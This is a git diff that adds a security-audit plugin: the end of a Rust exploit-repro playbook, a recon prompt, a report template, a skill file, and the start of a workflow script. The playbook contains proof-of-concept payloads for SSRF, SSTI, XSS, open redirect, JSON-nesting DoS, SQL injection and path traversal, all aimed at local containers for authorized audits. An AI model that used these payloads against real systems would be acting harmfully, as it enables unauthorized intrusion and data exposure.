+# SSRF — reqwest/hyper/isahc client fetching a user-supplied URL. Point at a
+# CONTAINER-LOCAL listener you control, never a real host. Run a canary in a
+# sidecar sharing $CN's network namespace, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+# Cloud-metadata SSRF guard test stays LOCAL — 169.254.169.254 is only a payload
+# string here, never an actual outbound request.
+
+# SSTI — user-controlled template text in tera / handlebars / askama-at-runtime;
+# submit a template expression and observe it evaluated:
+curl -s "http://127.0.0.1:$PORT/render?tpl=%7B%7B%207%2A7%20%7D%7D" | tee -a /tmp/poc.$FID.out
+
+# Reflected/stored XSS — manual HTML string-building or a template engine with
+# escaping disabled; confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Open redirect — a 3xx with a user-controlled Location header:
+curl -s -o /dev/null -D- "http://127.0.0.1:$PORT/redirect?next=https://evil.example" \
+  | grep -i '^location:'   # evidence is the header value, no external request made
+
+# Deserialization / DoS — serde_json/bincode/serde_yaml on untrusted input, or
+# an unbounded body. Observe a panic (500 + backtrace) or resource blowup:
+curl -s -H 'Content-Type: application/json' --data-binary @- \
+  "http://127.0.0.1:$PORT/api" <<< '{"deeply":'"$(printf '[%.0s' $(seq 1 100000))"'}' \
+  -o /dev/null -w '%{http_code}\n'
+docker logs --tail 20 $CN | grep -iE 'panic|RUST_BACKTRACE|thread .* panicked'
+
+# tonic/gRPC sink — invoke the method with grpcurl against the local container:
+docker run --rm --network "container:$CN" fullstorydev/grpcurl -plaintext \
+  -d '{"id":"1 OR 1=1"}' 127.0.0.1:50051 pkg.Service/Method
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, evaluated template, redirect header, panic backtrace)
+  → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; side effects are benign
+sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Won't serve but builds (library/CLI, or web boot blocked):** drive the
+   vulnerable function directly with a Rust test in the SDK image — the
+   highest-fidelity non-server proof. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink (exact-match name):
+   docker run --rm -v "$WT":/src -w /src -e CARGO_TARGET_DIR=/tmp/target \
+     rust:1.79-bookworm cargo test --locked vulnerable_case -- --nocapture
+
+   # Or drop a one-off integration test into tests/ and run it. An integration
+   # test imports the crate by its package name (from Cargo.toml).
+   cat > "$WT/tests/poc_$FID.rs" <<'EOF'
+   // replace `mycrate` with the package name from Cargo.toml
+   #[test]
+   fn poc() {
+       let out = mycrate::vulnerable("<payload>");   // call the vulnerable API
+       assert!(out.contains("<impact-marker>"), "no impact: {out}");
+       eprintln!("IMPACT: {out}");
+   }
+   EOF
+   docker run --rm -v "$WT":/src -w /src -e CARGO_TARGET_DIR=/tmp/target \
+     rust:1.79-bookworm cargo test --test "poc_$FID" -- --nocapture
+   ```
+
+   For an HTTP handler that won't boot standalone, exercise it in-process with
+   the framework's test client (no real port, no network) — still
+   `method: unit-test`:
+
+   ```rust
+   // axum: use tower::ServiceExt::oneshot against the Router
+   let app = build_router();
+   let res = app.oneshot(
+       Request::builder().uri("/download?file=../../etc/passwd").body(Body::empty()).unwrap()
+   ).await.unwrap();
+   // actix: actix_web::test::{init_service, call_service, TestRequest}
+   // assert the response body contains the leaked content
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/env, `*-sys` native
+   dep, private registry resolved but service deps absent):** record that
+   `cargo build --locked` succeeds, the lock is honored, and the vulnerable code
+   is present and reachable, with the line-referenced source→sink trace as
+   evidence. Set `method: build-only`.
+
+   ```sh
+   docker run --rm -v "$WT":/src -w /src -e CARGO_TARGET_DIR=/tmp/target \
+     rust:1.79-bookworm sh -c 'cargo build --locked --bins && cargo check --tests ; true'
+   ```
+
+3. **Cannot build at all (toolchain/edition mismatch, network/registry blocked,
+   unresolvable private deps):** construct a static PoC — the exact crafted input
+   plus the line-referenced source→sink path showing why it triggers. Set
+   `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/recon.md b/plugins/security/prompts/recon.md
new file mode 100644
index 0000000..021ee0e
--- /dev/null
+++ b/plugins/security/prompts/recon.md
@@ -0,0 +1,222 @@
+<!--
+RECON PROMPT — PHASE 1 of vuln-audit. You are a single fresh-context agent that
+runs BEFORE any finder. Your job is reconnaissance only: detect the stack, map
+the attack surface and trust boundaries, decide which finder classes are worth
+running and which to skip, pick a dynamic-verification strategy, and emit ONE
+structured recon summary the workflow forwards to every later phase. You do NOT
+report vulnerabilities here — you scope the hunt. Read AGENTS.md for the data
+contracts, taxonomy, and the binding signal-discipline policy. Read-only: do not
+mutate the target.
+-->
+
+# Recon — Phase 1 (stack, surface, scope, run strategy)
+
+Work the steps in order. Each step's output feeds the recon summary in step 7.
+Be fast and broad first, then precise. When a step is ambiguous, prefer the
+reading that EXPANDS attack surface (assume input is untrusted until proven
+otherwise) but NARROWS finder selection (skip a class only when you can justify
+it). Cite concrete file paths and line numbers for every claim — recon that
+points later phases at real code is worth ten of generic prose.
+
+## 1. Detect stack, frameworks, and build/run system
+
+Identify the primary language(s), frameworks, and how the target builds and runs.
+Map the result to exactly ONE env playbook key (drives Phase 6 repro):
+
+`crystal · ruby · node · python · go · php · java-jvm · rust · generic-docker · ci-iac`
+
+Detection signals (read-only; do not install anything):
+
+- **Manifests / lockfiles** — the ground truth for language + package manager:
+  - crystal: `shard.yml`, `shard.lock`
+  - ruby: `Gemfile`, `*.gemspec`, `Gemfile.lock`
+  - node: `package.json` (+ `package-lock.json`/`pnpm-lock.yaml`/`yarn.lock`), `tsconfig.json`
+  - python: `pyproject.toml`, `requirements*.txt`, `Pipfile`, `setup.py`, `poetry.lock`
+  - go: `go.mod`, `go.sum`
+  - php: `composer.json`, `composer.lock`
+  - java-jvm: `pom.xml`, `build.gradle(.kts)`, `settings.gradle`, `*.jar`
+  - rust: `Cargo.toml`, `Cargo.lock`
+- **Build/run tells** — `Dockerfile`, `docker-compose*.yml`, `Procfile`, `Makefile`,
+  `Taskfile.yml`, `bin/`, framework CLIs, and the manifest's scripts/tasks.
+- **Framework** — read deps + entry imports: web (Rails/Sinatra/Lucky/Kemal,
+  Express/Nest/Next/Fastify, Django/Flask/FastAPI, Gin/Echo/chi/net-http,
+  Laravel/Symfony/Slim, Spring/Quarkus/Micronaut, actix/axum/rocket), plus
+  ORMs, template engines, queue/worker libs, and serializers — note each, they
+  steer finder selection.
+
+**Playbook key decision:**
+
+- A single dominant app language → that language key.
+- **Polyglot:** pick the key for the language that owns the primary attack
+  surface (the network-facing app), note the others in `notes`. A thin shell of
+  one language around a core of another → key on the core.
+- No buildable app, just a `Dockerfile`/compose stack to run → `generic-docker`.
+- The repo's PRIMARY artifact is CI/CD pipelines or IaC (GitHub Actions/GitLab
+  CI/Forgejo workflows, Terraform/Pulumi/CloudFormation, k8s/Helm, Ansible) with
+  no app to run → `ci-iac`. (Note: an app repo that ALSO has workflows keys on
+  the app language; `ci-iac` is for infra-/pipeline-primary repos.)
+
+Record `stack` (the key) and `frameworks` (list).
+
+## 2. Map the attack surface and trust boundaries
+
+Enumerate every place untrusted input crosses into the system, and the dangerous
+sinks it could reach. For each, capture `file:line`, the kind, and the untrusted
+source. This is the map every finder navigates — be exhaustive on surface,
+precise on location.
+
+- **HTTP routes/handlers** — every route table, controller, middleware, and
+  handler. Capture method, path, auth requirement, and which params/body/headers
+  flow in. Note dynamic/wildcard routes and catch-alls.
+- **CLIs / entrypoints** — `main`/`bin`, argv parsing, subcommands, scripts run
+  with attacker-influenced args or stdin.
+- **Message/queue consumers** — AMQP/Kafka/SQS/Redis/NATS/cron/webhook handlers;
+  the payload is untrusted input.
+- **Deserialization points** — `JSON.parse`/`Marshal`/`pickle`/`yaml.load`/
+  `ObjectInputStream`/`unserialize`/`serde`/MessagePack/protobuf over untrusted
+  bytes; framework auto-binding/mass-assignment.
+- **File/path operations** — reads/writes/joins/globs/zips/uploads/temp files
+  where any path segment is caller-controlled (traversal, symlink, zip-slip).
+- **Outbound network calls** — every server-side HTTP/DB/SMTP/DNS/socket call
+  whose destination or content can be influenced by a caller (SSRF surface).
+- **Auth/authz boundaries** — login, session/token issuance & validation,
+  role/permission checks, tenant isolation, the line between
+  unauthenticated/authenticated/admin. Mark which routes sit on which side.
+- **Secrets/config loading** — env vars, config files, secret managers, key
+  material, connection strings; note defaults and committed values.
+- **Template/HTML rendering** — server-rendered views, string-built HTML, SSTI-
+  capable engines, `dangerouslySetInnerHTML`/`html_safe`/`|safe`/`v-html`.
+- **Trust boundaries** — draw the line for each: where does data go from
+  trusted→untrusted or low-priv→high-priv? An input is only interesting if it
+  reaches a sink ACROSS a boundary.
+
+For each surface entry note any **sanitizer/validator/authz/parameterization**
+already on the path — the FP guard. A sink fronted by an effective control is
+not a lead; record it so later phases don't re-chase it.
+
+## 3. Select relevant finder classes (and justify skips)
+
+For each of the 14 classes, decide RELEVANT or SKIPPED based on the surface from
+step 2. The 14 classes (see `prompts/finders/<key>.md`):
+
+`access-control · ssrf · injection · xss-ssti · auth-session · crypto ·
+deserialization · path-file · secrets · misconfig · supply-chain ·
+logging-errors · dos-redos · csrf-cors`
+
+Relevance heuristics (a class is RELEVANT when its source AND sink both exist):
+
+- **access-control** — any authz boundary or multi-tenant/object-owned resource
+  (IDOR). Almost always relevant if there are authenticated routes.
+- **ssrf** — relevant iff an outbound network call exists with a caller-
+  influenced destination (step 2 outbound list non-empty).
+- **injection** — relevant iff untrusted input reaches a SQL/NoSQL/OS/LDAP/XPath
+  interpreter. Skip if all DB access is ORM-parameterized AND no shell-out.
+- **xss-ssti** — relevant iff server emits HTML/templates with untrusted data,
+  or a template engine renders caller-controlled strings. Skip for pure JSON
+  APIs with no template engine and no HTML rendering.
+- **auth-session** — relevant iff the app issues/validates sessions, tokens,
+  passwords, MFA, or OAuth. Skip if there is no auth at all (note that fact).
+- **crypto** — relevant iff the code does its own crypto: hashing passwords,
+  signing/verifying tokens, encrypting data, RNG for security, TLS config. Skip
+  if no security-relevant crypto primitives are used directly.
+- **deserialization** — relevant iff untrusted bytes hit a deserializer (step 2
+  deserialization list non-empty), esp. native/object formats.
+- **path-file** — relevant iff a caller-influenced path reaches a file op.
+- **secrets** — relevant iff the repo loads/handles credentials or there is any
+  chance of committed secrets (almost always run a quick pass).
+- **misconfig** — relevant iff there is framework/server/cloud config: debug
+  flags, CORS, cookie flags, TLS, exposed admin/actuator, default creds.
+- **supply-chain** — relevant iff there are CI/CD workflows (Dangerous-Workflow,
+  script injection, over-broad tokens, unpinned actions) OR dependency manifests
+  with lockfiles (known-vuln deps). Code-exploitable checks ONLY (per AGENTS.md);
+  posture/SBOM/maintainership is NOT a finding.
+- **logging-errors** — relevant iff untrusted input is logged (log injection /
+  sensitive-data leak) or error handling exposes stack traces / leaks state /
+  fails open (A10).
+- **dos-redos** — relevant iff a user-controlled value reaches a regex, an
+  unbounded loop/allocation, a zip/decompress, or an expensive parse.
+- **csrf-cors** — relevant iff there are state-changing cookie-authenticated
+  routes, CORS config, or framing-sensitive UI. Skip pure token-auth APIs with
+  no cookies (note why).
+
+Output two lists. For every RELEVANT class, add a one-line **priority pointer**:
+the specific surfaces/files from step 2 that finder should hit first. For every
+SKIPPED class, add a one-line **justification** (why no reachable source→sink).
+Default to RELEVANT when uncertain — skipping is a claim you must back.
+
+## 4. Decide the dynamic-verification strategy
+
+Determine how Phase 6 will reproduce findings. Docker-first.
+
+- **Runnable?** Check for `Dockerfile`/`docker-compose*.yml` first (preferred,
+  hermetic), then a native run path (manifest scripts, `Procfile`, `Makefile`
+  targets, framework server command).
+- **Entry command + port** — the exact command that starts the app and the port
+  it binds (read it from config/compose/scripts, don't guess; note env vars and
+  dependent services — DB/cache/queue — needed to boot).
+- **Health check** — how to know it's up (a route, a log line, a port listen).
+- **Not runnable** (library, no server, missing deps, infra-only) → repro falls
+  back to a focused **unit-test** that drives the sink, or a **static PoC** /
+  build-only proof. Say which and why.
+
+Record `run_strategy` as one of:
+`docker-compose | docker | native | unit-test | static-poc`,
+plus the entry command, port, and any boot prerequisites in `notes`.
+
+## 5. Fold in target threat-model guidance
+
+Check for `<target>/.claude/claude-security-guidance.md`. If present, read it and
+fold its threat model into scope: crown-jewel assets, known trust boundaries,
+in/out-of-scope paths, prior findings, and any class-specific guidance. Let it
+RAISE priority and tighten scope; it does NOT lower the signal bar. Summarize the
+relevant points in `notes` and reflect any scope/priority changes in steps 2–4.
+If absent, note that and proceed with defaults.
+
+## 6. Signal discipline (binding — carry it into every later phase)
+
+Recon's selections directly gate noise. Enforce the AGENTS.md contract:
+
+- A class is RELEVANT only when there is a plausible REACHABLE path from
+  untrusted input to a dangerous sink with no effective control already on it.
+  No class earns a slot on defense-in-depth grounds alone.
+- No posture/process items (missing SECURITY.md, SBOM, license, maintainership).
+  These never gate a finder; at most they land in the report's Info appendix.
+- No style/lint nits, no unreachable/dead code, no speculative surfaces.
+- Prefer a tight scope that proves a few real issues over a broad scope that
+  drowns them. When you skip a class, you are asserting there is no reachable
+  source→sink — make that assertion only when the surface map backs it.
+
+## 7. Emit the recon summary
+
+Output exactly ONE structured object (this is the phase deliverable; later
+phases consume it). Shape:
+
+```json
+{
+  "stack": "<one playbook key>",
+  "frameworks": ["<framework/orm/template/queue lib>", "..."],
+  "run_strategy": "docker-compose | docker | native | unit-test | static-poc",
+  "entrypoints": [
+    { "kind": "http|cli|queue|cron|webhook", "ref": "file:line",
+      "detail": "GET /x | subcommand | consumer", "auth": "none|user|admin" }
+  ],
+  "attack_surface": [
+    { "kind": "route|cli|consumer|deser|file|outbound|authz|secret|template",
+      "ref": "file:line", "source": "<untrusted origin>",
+      "sink": "<dangerous op>", "existing_control": "<sanitizer/authz or null>",
+      "classes": ["<finder keys this surface feeds>"] }
+  ],
+  "relevant_classes": [
+    { "class": "<key>", "priority_surfaces": ["file:line", "..."] }
+  ],
+  "skipped_classes": [
+    { "class": "<key>", "reason": "<why no reachable source->sink>" }
+  ],
+  "notes": "run command + port + boot prereqs; polyglot/key rationale; target security-guidance points; blind spots/auth-gated areas; anything Phase 6 needs to boot the app"
+}
+```
+
+Rules for the object: `stack` is exactly one playbook key; `relevant_classes` +
+`skipped_classes` together cover all 14, no overlap; every `attack_surface` entry
+has a real `file:line`; `entrypoints` is the subset of surfaces where untrusted
+input first enters. Keep `notes` operational — it is the bridge to Phase 6.
diff --git a/plugins/security/prompts/report-template.md b/plugins/security/prompts/report-template.md
new file mode 100644
index 0000000..dfc3eb1
--- /dev/null
+++ b/plugins/security/prompts/report-template.md
@@ -0,0 +1,91 @@
+<!--
+AGENT GUIDANCE — read, do not emit this comment block.
+
+You are writing the final audit report for SENIOR ENGINEERS who understand
+security. Optimize for signal and brevity.
+
+Rules:
+- Lead with the worst. Sort findings by severity desc, then status.
+- Body = Critical/High/Medium that are `confirmed` or `likely` ONLY.
+  Low/Info and `triage` candidates go in the appendix. Never bury a Critical
+  under a pile of nits.
+- Per finding: 2–4 sentences of prose, max. Assume the reader knows what SSRF
+  is. Explain THIS instance, not the vuln class.
+- References do the heavy lifting instead of prose: cite terse linked IDs
+  (CWE-89, A05:2025, ASVS V1.2.4). One line of refs, not a paragraph.
+- Evidence is the point. Every confirmed finding shows the PoC command and the
+  observed result. A finding without evidence or a source→sink trace does not
+  belong in the body — move it to triage.
+- Proposed fix = the high-level DIRECTION of the change (what must change and
+  why), 1–2 sentences. NOT a diff, exact code, or step-by-step patch — the actual
+  implementation is the next human/agent's job.
+- If there are zero Critical/High, say so plainly in the summary — that is a
+  good result, not a reason to inflate Mediums.
+- NO status/tally table. The GitHub scan issue and its sub-issues are the live
+  status (open/fixed); duplicating it here just goes stale. Weave the counts into
+  the summary prose ("one critical and one high, both confirmed"). Verification
+  status (confirmed/likely) stays as each finding's badge.
+- Omit empty sections.
+-->
+
+# Security Audit — {{target}} @ {{ref}}
+
+**Scope:** {{paths_in_scope}} · **Out of scope:** {{paths_excluded}}
+**Date:** {{date}} · **Method:** static + dynamic (isolated worktree, live PoC) · **Tool:** vuln-audit {{version}}
+
+## Summary
+
+{{2–4 sentences: overall posture and the single most important thing to fix
+first. Name the dominant risk theme. Weave the counts into the prose (e.g. "one
+critical and one high, both confirmed; one medium") — no status table, the
+GitHub scan issue is the live status.}}
+
+## Findings
+
+<!-- One block per confirmed/likely Critical/High/Medium. Repeat. -->
+
+### [{{id}}] {{title}} · {{Severity}} · {{Confirmed|Likely}}
+
+**Class:** {{vuln_class}} · **Refs:** [{{CWE}}](https://cwe.mitre.org/data/definitions/{{n}}.html) · [{{A0x:2025}}](https://owasp.org/Top10/) · [ASVS {{Vx.y.z}}](https://github.com/OWASP/ASVS)
+**Location:** `{{file}}:{{line}}`{{ · +N other call sites}}
+
+{{2–4 sentences: the specific flaw, the untrusted source, the sink, and why the
+path is reachable (no effective sanitizer/authz). Senior audience — be direct.}}
+
+**PoC**
+```
+{{$ command that reproduced it}}
+{{observed output that proves impact}}
+```
+
+**Impact:** {{one line.}}
+**Proposed fix:** {{1–2 sentences — the high-level direction of the change needed
+and why (e.g. "resolve identity from a server-side session keyed by user id, not
+the client cookie"). NOT a diff or line-level patch — implementation is left to
+whoever picks up the issue.}}
+
+---
+
+## Lower severity (Medium)
+
+<!-- Confirmed/likely Mediums as one-liners. -->
+- `{{file:line}}` — {{one-line description}} — {{ref}} — **fix:** {{one-liner}}
+
+## Appendix
+
+### Low / Info
+| Location | Note | Ref |
+|----------|------|-----|
+| `{{file:line}}` | {{one line}} | {{ref}} |
+
+### Triage — not confirmed
+<!-- Candidates that did not survive verification or could not be reproduced.
+     Listed for transparency so reviewers can re-check; not asserted as bugs. -->
+- `{{file:line}}` — {{candidate}} — **why unconfirmed:** {{refuted by verify / could not reproduce / needs prod-like data}}
+
+### Coverage & method
+- **Classes assessed:** {{list}} · **Skipped (not applicable):** {{list}}
+- **ASVS chapters touched:** {{list}}
+- **Dynamic verification:** {{how the target was built/run; what was and wasn't reproducible and why}}
+- **Tools used:** {{semgrep/gitleaks/trivy if present, else "LLM-native"}}
+- **Blind spots:** {{anything not reachable by this audit — auth-gated areas, external services, etc.}}
diff --git a/plugins/security/skills/audit/SKILL.md b/plugins/security/skills/audit/SKILL.md
new file mode 100644
index 0000000..b31f646
--- /dev/null
+++ b/plugins/security/skills/audit/SKILL.md
@@ -0,0 +1,77 @@
+---
+description: >-
+  Run a white-box, dynamically-verified security audit (internal pentest) of a
+  target code repository. Use when the user asks to audit/pentest a repo for
+  vulnerabilities, find security bugs with proof, or runs /security:audit.
+  Produces a terse, senior-engineer report of proven findings with live PoCs and
+  a high-level proposed fix per finding.
+---
+
+# security:audit
+
+Drives the bundled `vuln-audit` workflow: recon → triage → consolidate → deep
+review → adversarial verify → dynamic PoC → report. Design spec and data
+contracts are in `${CLAUDE_PLUGIN_ROOT}/AGENTS.md`; output handling / issue
+tracking in `${CLAUDE_PLUGIN_ROOT}/docs/issue-tracking.md`. Read the spec before
+changing anything.
+
+## Input
+
+```
+/security:audit <target-path> [--no-dynamic] [--classes a,b,c] [--ref <git-ref>] [--out <dir>]
+```
+
+`$ARGUMENTS` holds the target path and any flags.
+
+- `<target-path>` — absolute path to the repo to audit (required).
+- `--no-dynamic` — skip the build/run/PoC phase (static + adversarial verify only).
+- `--classes` — restrict to specific vuln-class keys (see `AGENTS.md` taxonomy).
+- `--ref` — git ref to audit (default `HEAD`).
+- `--out` — writable directory for the output bundle (default: `<cwd>/vuln-audit-reports`).
+
+## Steps
+
+1. **Parse `$ARGUMENTS`** into the target path + flags. The bundled tool root is
+   `${CLAUDE_PLUGIN_ROOT}` (expands to the plugin's install dir; it holds
+   `prompts/`, `workflows/`, and the docs — read-only).
+2. **Pick a writable `outDir`** — the plugin root is read-only/ephemeral, so the
+   bundle must go elsewhere. Use `--out` if given, else `<cwd>/vuln-audit-reports`
+   (absolute path). This is also where a courier later fetches the bundle from.
+3. **Validate the target** — confirm it exists and is a git repo
+   (`git -C <target> rev-parse --git-dir`). Worktree isolation and the live-PoC
+   phase need git. If it isn't a repo, warn and proceed with `--no-dynamic`.
+4. **Preflight host capabilities** → assemble a `hostNotes` string: is `docker`
+   usable non-interactively (note if it needs `sudo`); which native runtimes are
+   present (`python3`, `node`, `ruby`, `go`, `crystal`, ...). If dynamic is on
+   but neither docker nor a usable native runtime exists, fall back to
+   `--no-dynamic` and say repro will be static/unit-test only.
+5. **Check target threat-model** — note whether
+   `<target>/.claude/claude-security-guidance.md` exists; recon folds it in.
+6. **Invoke the workflow** (it runs in the background and notifies on completion):
+   ```
+   Workflow({ scriptPath: '${CLAUDE_PLUGIN_ROOT}/workflows/vuln-audit.js', args: {
+     toolRoot: '${CLAUDE_PLUGIN_ROOT}',
+     outDir: '<abs writable outDir>',
+     target: '<abs target-path>',
+     ref: '<ref or HEAD>',
+     dynamic: <true unless --no-dynamic>,
+     onlyClasses: <array or omit>,
+     scope: '<what is in/out of scope>',
+     hostNotes: '<from step 4>'
+   }})
+   ```
+7. **Present the result** — when it completes, read `report_path` and give a
+   tight summary: severity counts and the top 1–3 confirmed findings (title +
+   location + one-line impact). Point to the bundle dir; don't paste the whole
+   report. Surface anything that blocked dynamic verification.
+
+## Notes
+
+- High-signal is the contract: the workflow drops noise, posture/process items,
+  and unreachable findings on purpose. Don't reintroduce them in the summary.
+- The report's remediation is a **high-level proposed fix** (direction, not a
+  patch) — implementation is left to whoever takes the finding.
+- This is the deepest layer of defense-in-depth, complementing the in-session
+  security-guidance plugin, `/security-review`, and PR Code Review.
+- Authorized testing only: target repos you own or are explicitly cleared to
+  audit. All PoC traffic stays local; never fire exploits at external hosts.
diff --git a/plugins/security/workflows/vuln-audit.js b/plugins/security/workflows/vuln-audit.js
new file mode 100644
index 0000000..658380a
--- /dev/null
+++ b/plugins/security/workflows/vuln-audit.js
@@ -0,0 +1,229 @@
+export const meta = {
+  name: 'vuln-audit',
+  description: 'White-box, dynamically-verified security audit of a target repo (recon -> triage -> deep review -> adversarial verify -> dynamic PoC -> report)',
+  whenToUse: 'Invoked by the /vuln-audit skill. Runs a multi-phase, high-signal security audit and writes a senior-engineer report.',
+  phases: [
+    { title: 'Recon', detail: 'detect stack, map attack surface, pick run strategy' },
+    { title: 'Triage', detail: 'one finder per relevant vuln class' },
+    { title: 'Consolidate', detail: 'dedup + drop noise + stable IDs' },
+    { title: 'Review', detail: 'deep review: reachable source->sink with no mitigation' },
+    { title: 'Verify', detail: 'adversarial skeptic panel tries to refute' },
+    { title: 'Repro', detail: 'build + run + live PoC in an isolated worktree' },
+    { title: 'Report', detail: 'synthesize the senior-engineer report' },
+  ],
+}
+
+// ---- inputs (assembled by the skill) ----
+// The Workflow runtime may deliver `args` as a JSON string rather than a parsed
+// object; normalize so every input below is read from a real object.
+const A = (typeof args === 'string') ? JSON.parse(args) : (args && typeof args === 'object' ? args : {})
+if (!A.toolRoot || !A.target) {
+  throw new Error(`vuln-audit: missing required args (toolRoot, target). Got keys: ${Object.keys(A).join(', ') || 'none'}`)
+}
+const TOOL = String(A.toolRoot).replace(/\/+$/, '')   // this tool's repo (has prompts/, reports/)
+const TARGET = String(A.target).replace(/\/+$/, '')
+const REF = A.ref || 'HEAD'
+const DYNAMIC = A.dynamic !== false                    // dynamic verification on by default
+const ONLY = (() => {           // accept array, JSON-string-of-array, or comma-separated string
+  let v = A.onlyClasses
+  if (typeof v === 'string') { try { v = JSON.parse(v) } catch (_) { v = v.split(',') } }
+  if (Array.isArray(v)) { const a = v.map(s => String(s).trim()).filter(Boolean); return a.length ? a : null }
+  return null
+})()
+const TARGET_NAME = TARGET.split('/').pop() || 'target'
+const SCOPE = A.scope || TARGET
+const HOST = A.hostNotes || ''        // host capability/constraint notes (e.g. "docker needs sudo; python3 native available")
+const OUT = A.outDir ? String(A.outDir).replace(/\/+$/, '') : TOOL   // writable bundle output dir; defaults to toolRoot (standalone), but a plugin MUST pass a writable outDir — the plugin root is read-only/ephemeral
+
+const ALL_CLASSES = ['access-control', 'ssrf', 'injection', 'xss-ssti', 'auth-session', 'crypto', 'deserialization', 'path-file', 'secrets', 'misconfig', 'supply-chain', 'logging-errors', 'dos-redos', 'csrf-cors']
+
+// Short class codes for the human-facing display id (e.g. training-tool-AC-1f3a).
+const CLASS_CODE = { 'access-control': 'AC', ssrf: 'SSRF', injection: 'INJ', 'xss-ssti': 'XSS', 'auth-session': 'AUTH', crypto: 'CRYPTO', deserialization: 'DESER', 'path-file': 'PATH', secrets: 'SEC', misconfig: 'MISC', 'supply-chain': 'SUPPLY', 'logging-errors': 'LOG', 'dos-redos': 'DOS', 'csrf-cors': 'CSRF' }
+// Deterministic fingerprint (djb2) over class|file|sink — the stable dedup key
+// across scans, identical on the VM and the courier (no shared allocator needed).
+function fpHash(s) { let h = 5381; for (let i = 0; i < s.length; i++) h = ((h * 33) ^ s.charCodeAt(i)) >>> 0; return h.toString(16).padStart(8, '0') }
+function fingerprint(f) { return fpHash(`${f.vuln_class}|${(f.file || '').toLowerCase()}|${(f.sink || '').toLowerCase()}`) }
+
+const SIGNAL = 'SIGNAL DISCIPLINE: audience is senior engineers; stay high-signal. Only treat as real an issue with a REACHABLE path from untrusted input to a dangerous sink, with no effective sanitizer/validator/authz on the path. No style nits, no generic defense-in-depth without a concrete sink, no unreachable/dead code, no posture/process items. Prefer a few proven findings over many speculative ones.'
+
+const LENSES = {
+  exploitability: 'Can a real attacker trigger this with realistic access, and is the impact as claimed? If it needs implausible preconditions, refute.',
+  reachability: 'Is the sink actually reachable from untrusted input at runtime given routing, auth guards, and feature flags? If the path is gated or dead, refute.',
+  correctness: 'Is the technical claim accurate — is this API/pattern genuinely dangerous here, or has the code been misread (safe wrapper, parameterized, framework-escaped)? If misread, refute.',
+}
+
+// ---- schemas ----
+const FINDING_PROPS = {
+  id: { type: 'string' },
+  title: { type: 'string' },
+  vuln_class: { type: 'string' },
+  owasp: { type: 'string' },
+  cwe: { type: 'string' },
+  asvs: { type: 'string' },
+  severity: { enum: ['critical', 'high', 'medium', 'low', 'info'] },
+  status: { enum: ['confirmed', 'likely', 'triage'] },
+  confidence: { enum: ['low', 'medium', 'high'] },
+  file: { type: 'string' },
+  line: { type: 'integer' },
+  code_excerpt: { type: 'string' },
+  source: { type: 'string' },
+  sink: { type: 'string' },
+  data_flow: { type: 'string' },
+  sanitizers_checked: { type: 'string' },
+  rationale: { type: 'string' },
+  exploit_sketch: { type: 'string' },
+  dynamic_poc_plan: { type: 'string' },
+  proposed_fix: { type: 'string' },
+  locations: { type: 'array', items: { type: 'string' } },
+}
+const FINDING = { type: 'object', properties: FINDING_PROPS, required: ['title', 'vuln_class', 'severity', 'file', 'rationale'], additionalProperties: true }
+const FINDINGS = { type: 'object', properties: { findings: { type: 'array', items: FINDING } }, required: ['findings'], additionalProperties: true }
+// Matches the contract emitted by prompts/recon.md: `stack` is one playbook key,
+// `run_strategy` is an enum string, `relevant_classes` is [{class, priority_surfaces}].
+const RECON = {
+  type: 'object',
+  properties: {
+    stack: { type: 'string' },
+    frameworks: { type: 'array', items: { type: 'string' } },
+    run_strategy: { enum: ['docker-compose', 'docker', 'native', 'unit-test', 'static-poc'] },
+    entrypoints: { type: 'array', items: { type: 'object', additionalProperties: true } },
+    attack_surface: { type: 'array', items: { type: 'object', additionalProperties: true } },
+    relevant_classes: { type: 'array', items: { type: 'object', properties: { class: { type: 'string' }, priority_surfaces: { type: 'array', items: { type: 'string' } } }, required: ['class'], additionalProperties: true } },
+    skipped_classes: { type: 'array', items: { type: 'object', additionalProperties: true } },
+    notes: { type: 'string' },
+  },
+  required: ['stack', 'run_strategy', 'relevant_classes'],
+  additionalProperties: true,
+}
+const DEEP = { type: 'object', properties: { keep: { type: 'boolean' }, reject_reason: { type: 'string' }, finding: FINDING }, required: ['keep', 'finding'], additionalProperties: true }
+const VERDICT = { type: 'object', properties: { lens: { type: 'string' }, refuted: { type: 'boolean' }, confidence: { enum: ['low', 'medium', 'high'] }, reasoning: { type: 'string' } }, required: ['refuted', 'reasoning'], additionalProperties: true }
